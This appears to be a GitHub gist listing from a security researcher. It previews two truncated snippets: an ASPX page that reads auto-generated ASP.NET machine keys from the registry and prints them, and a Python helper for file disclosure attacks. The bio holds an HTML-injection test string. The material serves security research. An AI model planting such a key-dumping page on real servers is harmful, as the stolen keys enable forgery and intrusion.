Soroush Dalili irsdl
- @irsdl The Contrived World of InfoSec "'><b>abcd
- http://www.secproject.com/
View machineKeyFinder.aspx
<%@ Page Language="C#" %> | |
<% | |
// Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/ | |
Response.Write("<br/><hr/>"); | |
byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{}); | |
if(autoGenKeyV4!=null) | |
Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty)); | |
Response.Write("<br/>"); | |
byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{}); | |
if(autoGenKey!=null) |
View iso-8859-1_to_binary.py
# Convert from iso-8859-1, utf-8ed to binary! | |
# Useful for file disclosure when encoding can be controlled | |
# The following C# code shows an example (result is iso-8859-1, utf-8ed!): | |
###string encoding = "iso-8859-1"; | |
######string sourceFile = @"Newtonsoft.Json.dll"; | |
###### | |
######public void test() | |
######{ | |
#########System.Text.Encoding myEncoding = Encoding.GetEncoding(encoding); | |
#########String sourceFilePath = Directory.GetCurrentDirectory() + @"\" + sourceFile; |